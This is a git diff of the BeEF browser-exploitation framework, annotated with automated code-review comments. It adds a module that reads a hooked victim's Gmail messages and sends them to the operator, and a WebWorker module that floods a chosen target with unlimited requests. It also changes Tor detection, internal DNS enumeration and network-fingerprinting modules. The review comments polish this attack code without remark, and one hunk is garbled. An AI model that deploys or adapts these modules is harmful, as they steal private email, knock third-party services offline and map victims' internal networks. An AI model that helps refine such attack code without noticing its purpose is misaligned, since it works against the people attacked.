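Review bot: `var result;` is never initialised, so when the wrapped code throws, the `result += n + " " + e[n] + "\n"` accumulation in the catch block begins with the string "undefined"; `var result = '';` fixes it. The same uninitialised `result` appears in the new modules/misc/read_gmail/command.js later in this diff, where `result += x.responseText` prefixes "undefined" even on the success path. Apart from the header swap, the hunk appears to be a whole-file rewrite of otherwise unchanged lines (presumably a line-ending change), so nothing else is new here.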
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/raw_javascript/module.rb b/modules/misc/raw_javascript/module.rb index 5a507d0b8..dcc067b3b 100644 --- a/modules/misc/raw_javascript/module.rb +++ b/modules/misc/raw_javascript/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Raw_javascript < BeEF::Core::Command 
diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/misc/read_gmail/command.js similarity index 54% rename from modules/exploits/zenoss_daemon_csrf/command.js rename to modules/misc/read_gmail/command.js index 4b753f8ea..680c50088 100644 --- a/modules/exploits/zenoss_daemon_csrf/command.js +++ b/modules/misc/read_gmail/command.js @@ -14,19 +14,31 @@ // limitations under the License. // beef.execute(function() { - var base = '<%= @base %>'; - var service = '<%= @service %>'; - var action = '<%= @action %>'; + var result; - var zenoss_daemon_iframe = beef.dom.createInvisibleIframe(); - zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action); - - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); - - cleanup = function() { - document.body.removeChild(zenoss_daemon_iframe); - } - setTimeout("cleanup()", 15000); + try { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/feed/atom', false); + x.send(); + str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g; + var match; + while(match = re.exec(str)) { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false); + x.send(); + result += x.responseText; + } + + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); }); + + + + + diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/misc/read_gmail/config.yaml similarity index 64% rename from modules/chrome_extensions/get_chrome_extensions/config.yaml rename to modules/misc/read_gmail/config.yaml index 69718be2e..2b0baefbf 100644 --- a/modules/chrome_extensions/get_chrome_extensions/config.yaml +++ b/modules/misc/read_gmail/config.yaml 
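Review bot: `x` and `str` are assigned without `var` inside the callback, so they become globals on the hooked page's window; declare them locally (`var x, str;` at the top of the callback next to `var result;`, and initialise `result` to `''` so the concatenation does not start with "undefined"). The character class `[A-Z,a-z,0-9]` also matches a literal comma; `[A-Za-z0-9]` is what is meant. The context lines 14–16 still carry the old Apache header text while the rest of this commit moves files to the `doc/COPYING` header, so this renamed file was presumably missed.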
@@ -15,12 +15,11 @@ # beef: module: - detect_chrome_extensions: + read_gmail: enable: true - category: "Chrome Extensions" - name: "Get Chrome Extensions" - description: "This module detects if any of the top 1,000 Chrome extensions are installed." - authors: ["koto", "bcoles"] + category: "Misc" + name: "Read Gmail" + description: "If we are able to run in the context of mail.google.com (either by SOP bypass or other issue) then lets go read some email, grabs unread message ids from gmails atom feed, then grabs conent of each message" + authors: ["mh"] target: - working: ["C"] - not_working: ["All"] + user_notify: ['ALL'] diff --git a/modules/chrome_extensions/get_chrome_extensions/module.rb b/modules/misc/read_gmail/module.rb similarity index 74% rename from modules/chrome_extensions/get_chrome_extensions/module.rb rename to modules/misc/read_gmail/module.rb index fa42f2e97..d0ec4d52c 100644 --- a/modules/chrome_extensions/get_chrome_extensions/module.rb +++ b/modules/misc/read_gmail/module.rb @@ -13,16 +13,14 @@ # See the License for the specific language governing permissions and # limitations under the License. # -# More info: -# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html -# -class Detect_chrome_extensions < BeEF::Core::Command - - def post_execute - content = {} - content['extension'] = @datastore['extension'] - save content - end +class Read_gmail < BeEF::Core::Command -end + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + save({'result' => @datastore['result']}) + end +end diff --git a/modules/network/DOSer/command.js b/modules/network/DOSer/command.js new file mode 100644 index 000000000..0c4307722 --- /dev/null +++ b/modules/network/DOSer/command.js 
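Review bot: The new `description:` string has typos ("conent" → "content", "gmails" → "Gmail's", "lets" → "let's"). The `target:` block now contains only `user_notify: ['ALL']`, whereas the other modules in this commit (DOSer, detect_tor) declare `working:`; confirm the module loader accepts a target block without `working:`. The companion module.rb hunk likewise keeps the old Apache header in its context lines while the rest of the commit switches to the `doc/COPYING` header.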
@@ -0,0 +1,33 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var url = '<%= @url %>'; + var delay = '<%= @delay %>'; + var method = '<%= @method %>'; + var post_data = '<%= @post_data %>'; + + if(!!window.Worker){ + var myWorker = new Worker(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/worker.js'); + + myWorker.onmessage = function (oEvent) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data); + }; + + var data = {}; + data['url'] = url; + data['delay'] = delay; + data['method'] = method; + data['post_data'] = post_data; + + myWorker.postMessage(data); + }else{ + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.'); + } + + +}); diff --git a/modules/network/DOSer/config.yaml b/modules/network/DOSer/config.yaml new file mode 100644 index 000000000..553f3f934 --- /dev/null +++ b/modules/network/DOSer/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + doser: + enable: true + category: "Network" + name: "DOSer" + description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run." + authors: ["antisnatchor"] + target: + working: ["ALL"] diff --git a/modules/network/DOSer/module.rb b/modules/network/DOSer/module.rb new file mode 100644 index 000000000..625a98151 --- /dev/null +++ b/modules/network/DOSer/module.rb 
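Review bot: The four option values are interpolated straight into single-quoted JS string literals (`var url = '<%= @url %>';` and the three lines below it), so an option containing a quote, backslash or newline — quite possible for `post_data` — yields a syntax error in the generated script rather than a request; emitting them JSON-encoded on the Ruby side (e.g. `var post_data = <%= @post_data.to_json %>;`, if a JSON library is loaded in BeEF) avoids that. `delay` is likewise passed to the worker as a string and relies on implicit coercion in `setInterval`; converting it once with `parseInt(delay, 10)` before `postMessage` keeps the contract explicit. `if(!!window.Worker)` can simply be `if (window.Worker)`.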
@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Doser < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js')
+ end
+
+ def self.options
+ return [
+ {'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'},
+ {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'},
+ {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'},
+ {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'}
+ ]
+ end
+
+ def post_execute
+ return if @datastore['result'].nil?
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/network/DOSer/worker.js b/modules/network/DOSer/worker.js
new file mode 100644
index 000000000..70a0db010
--- /dev/null
+++ b/modules/network/DOSer/worker.js
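Review bot: `pre_send` calls `AssetHandler.instance.bind(...)` every time the module is sent, so unless `bind` is idempotent the `/worker` asset is registered repeatedly; binding once (for example guarded by a class-level flag) would be safer, and checking how other modules in the tree use `bind` will tell which is the case. The default `post_data` value `'key=value&&Aa=Aa&BB'` contains a doubled `&` and a key with no value, which reads like leftover test input; a plain `key=value` default is clearer. A short comment above `pre_send` noting that it serves worker.js under the `/worker.js` path that command.js requests would help the next reader connect the two files.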
@@ -0,0 +1,45 @@ +var url = ""; +var delay = 0; +var method = ""; +var post_data = ""; +var counter = 0; + +onmessage = function (oEvent) { + url = oEvent.data['url']; + delay = oEvent.data['delay']; + method = oEvent.data['method']; + post_data = oEvent.data['post_data']; + doRequest(); +}; + +function noCache(u){ + var result = ""; + if(u.indexOf("?") > 0){ + result = "&" + Date.now() + Math.random(); + }else{ + result = "?" + Date.now() + Math.random(); + } + return result; +} + +function doRequest(){ + setInterval(function(){ + + var xhr = new XMLHttpRequest(); + xhr.open(method, url + noCache(url)); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + if(method == "POST"){ + xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); + xhr.send(post_data); + }else{ + xhr.send(null); + } + counter++; + + },delay); + + setInterval(function(){ + postMessage("Requests sent: " + counter); + },10000); +} \ No newline at end of file diff --git a/modules/network/detect_soc_nets/command.js b/modules/network/detect_soc_nets/command.js index 333bce662..d33d623c5 100644 --- a/modules/network/detect_soc_nets/command.js +++ b/modules/network/detect_soc_nets/command.js 
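Review bot: The two `setInterval` timers started in `doRequest` are never stored or cleared, and `onmessage` starts a fresh pair for every message it receives, so a second `postMessage` from the page doubles the request rate and there is no way to stop the worker short of terminating it; keep the interval ids, clear them on a subsequent message or once a configurable request cap is reached, and `counter` then also stops growing without bound. `method == "POST"` should use strict equality, and `delay` arrives as a string from the page, so `setInterval(..., delay)` depends on implicit coercion — `parseInt(delay, 10)` in `onmessage` makes that explicit. The file also lacks a trailing newline (`\ No newline at end of file`).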
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var facebookresult = ""; @@ -26,7 +17,7 @@ beef.execute(function() { img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); - img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date(); + img.src = 'https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD?'+ new Date(); img.id = 'gmailimg'; img.setAttribute("attr","start"); img.onerror = function() { diff --git a/modules/network/detect_soc_nets/config.yaml b/modules/network/detect_soc_nets/config.yaml index 90a1c6355..8814d0585 100644 --- a/modules/network/detect_soc_nets/config.yaml +++ b/modules/network/detect_soc_nets/config.yaml 
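Review bot: The replaced `img.src` is another opaque, hard-coded Gmail asset path that will break again the next time it changes, which is exactly what detect_tor in this same commit addressed by moving its probe URL into a module option (`tor_resource`); a matching `gmail_resource` option in detect_soc_nets/module.rb would keep the two modules consistent. `'?'+ new Date()` also appends a `Date.toString()` value containing spaces to the URL; `Date.now()` is the usual cache-busting suffix. The enclosing `beef.execute` callback starts outside this hunk.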
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/detect_soc_nets/module.rb b/modules/network/detect_soc_nets/module.rb index 8cb1549e1..b31ad4415 100644 --- a/modules/network/detect_soc_nets/module.rb +++ b/modules/network/detect_soc_nets/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_soc_nets < BeEF::Core::Command 
diff --git a/modules/network/detect_tor/command.js b/modules/network/detect_tor/command.js index 78b94c763..95e89dd97 100644 --- a/modules/network/detect_tor/command.js +++ b/modules/network/detect_tor/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if (document.getElementById('torimg')) { @@ -23,7 +14,9 @@ beef.execute(function() { img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); - img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif'; + //img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif'; + //img.src = 'http://xycpusearchon2mc.onion/deeplogo.jpg' + img.src = '<%= @tor_resource %>'; img.id = 'torimg'; img.setAttribute("attr","start"); img.onerror = function() { diff --git a/modules/network/detect_tor/config.yaml b/modules/network/detect_tor/config.yaml index d0294391e..710f496c9 100644 --- a/modules/network/detect_tor/config.yaml +++ b/modules/network/detect_tor/config.yaml 
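Review bot: The two commented-out `//img.src = ...` lines should be deleted rather than left beside the new `img.src = '<%= @tor_resource %>';` — the option default in module.rb now records the chosen URL, and dead code is just noise for the next reader. `@tor_resource` is interpolated into a single-quoted literal unescaped, so a value containing a quote breaks the generated script; the same remark applies to the DOSer option values in this commit. The enclosing callback starts and ends outside this hunk.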
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb index f75c91be9..65e7532c0 100644 --- a/modules/network/detect_tor/module.rb +++ b/modules/network/detect_tor/module.rb 
@@ -1,22 +1,13 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_tor < BeEF::Core::Command def self.options return [ + {'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'}, {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'} ] end diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js index 4e3ea47d0..172a34c2d 100644 --- a/modules/network/dns_enumeration/command.js +++ b/modules/network/dns_enumeration/command.js 
@@ -1,43 +1,34 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dns_list = "<%= @dns_list %>"; var timeout = parseInt("<%= @timeout %>"); - var cont=0; + var cont=0; var port = 900; var protocol="http://"; var hostnames; if(dns_list!="%default%") { - hostnames = dns_list.split(","); + hostnames = dns_list.split(","); } else { hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", 
"ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml"); } - + function notify() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]); check_next(); } - - function check_next() { + + function check_next() { cont++; - if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); + if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); } function do_resolv(url) { @@ -51,15 +42,15 @@ beef.execute(function() { } else { return -1; } - + xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } }; xhr.send(); - var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000); + var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout); } beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded'); if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); } }); diff --git a/modules/network/dns_enumeration/config.yaml b/modules/network/dns_enumeration/config.yaml index 93327e416..ae29a432e 100644 --- a/modules/network/dns_enumeration/config.yaml +++ b/modules/network/dns_enumeration/config.yaml 
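Review bot: `timeout` now drives the per-host detection timer in `do_resolv`, but it comes from `parseInt("<%= @timeout %>")` with no radix and no NaN check, so a blank or non-numeric option makes `setTimeout(..., NaN)` fire immediately and every hostname is reported as found. Use `var timeout = parseInt("<%= @timeout %>", 10); if (isNaN(timeout) || timeout <= 0) timeout = 4000;` (the value the hunk replaces). The `check_next` line in the first hunk looks garbled by extraction (the `<` comparison and the `beef.net.send` call are run together), so that hunk cannot be fully reviewed here; `do_resolv` starts outside the second hunk.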
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/network/dns_enumeration/module.rb b/modules/network/dns_enumeration/module.rb
index 21449af1d..e766ecf85 100644
--- a/modules/network/dns_enumeration/module.rb
+++ b/modules/network/dns_enumeration/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # DNS Enumeration
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index ddcd897cd..8d4f1f85d 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -1,24 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dom = document.createElement('b'); var ips = new Array(); ipRange = "<%= @ipRange %>"; - ports = "<%= @ports %>"; + ports = "<%= @ports %>"; if(ports != null){ ports = ports.split(','); } @@ -26,7 +17,7 @@ beef.execute(function() { if(ipRange != null){ // ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated. // (only C class IPs are supported atm) - ipBounds = ipRange.split('-'); + ipBounds = ipRange.split('-'); lowerBound = ipBounds[0].split('.')[3]; upperBound = ipBounds[1].split('.')[3]; 
@@ -56,72 +47,193 @@ beef.execute(function() { ]; } + /* URLs in the form of: + "Dev/App Name", -- string + "Default Port", -- string + "Protocol", -- string -- http/https + "Use Multiple Ports if specified", -- boolean + "IMG path", -- string -- file path + "IMG width", -- integer + "IMG height" -- integer + */ var urls = new Array( - // in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height" - new Array("Apache",":80",false,"/icons/apache_pb.gif",259,32), - new Array("Apache 2.x",":80",false,"/icons/apache_pb2.gif",259,32), - new Array("Microsoft IIS 7.x",":80",false,"/welcome.png",571,411), - new Array("Microsoft IIS",":80",false,"/pagerror.gif",36,48), - new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16), - new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21), - new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28), - new Array("Billion Router",":80",false,"/customized/logo.gif",318,69), - new Array("Billion Router",":80",false,"/customized/logo.gif",224,55), - new Array("SMC Networks",":80",false,"/images/logo.gif",133,59), - new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52), - new Array("Linksys NAS",":80",false,"/logo.jpg",194,52), - new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250), - new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97), - new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66), - new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62), - new Array("Dell Laser Printer",":80",false,"/ews/images/delllogo.gif",100,100), - new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52), - new Array("HP LaserJet Printer",":80",false,"/hp/device/images/logo.gif",42,27), - new Array("HP LaserJet Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52), - new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105), - new Array("Siemens 
Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76), - new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327), - new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26), - new Array("TwonkyMedia Server",":9000",false,"/images/TwonkyMediaServer_logo.jpg",150,82), - new Array("Alt-N MDaemon World Client",":3000",false,"/LookOut/biglogo.gif",342,98), - new Array("VLC Media Player",":8080",false,"/images/white_cross_small.png",9,9), - new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100), - new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31), - new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59), - new Array("Xerox Printer",":80",false,"/printbut.gif",30,30), - new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26), - new Array("Epson Printer",":80",false,"/cyandot.gif",1,1), - new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52), - new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60), - new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30), - new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16), - new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149), - new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32), - new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16), - new Array("Glassfish Server",":4848",false,"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200) + new Array( + "Apache", + "80","http",false, + "/icons/apache_pb.gif",259,32), + new Array( + "Apache 2.x", + "80","http",false, + "/icons/apache_pb2.gif",259,32), + new Array( + "Microsoft IIS 7.x", + "80","http",false, + "/welcome.png",571,411), + new Array( + "Microsoft IIS", + "80","http",false, + "/pagerror.gif",36,48), + new Array( + "QNAP NAS", + "8080","http",false, + 
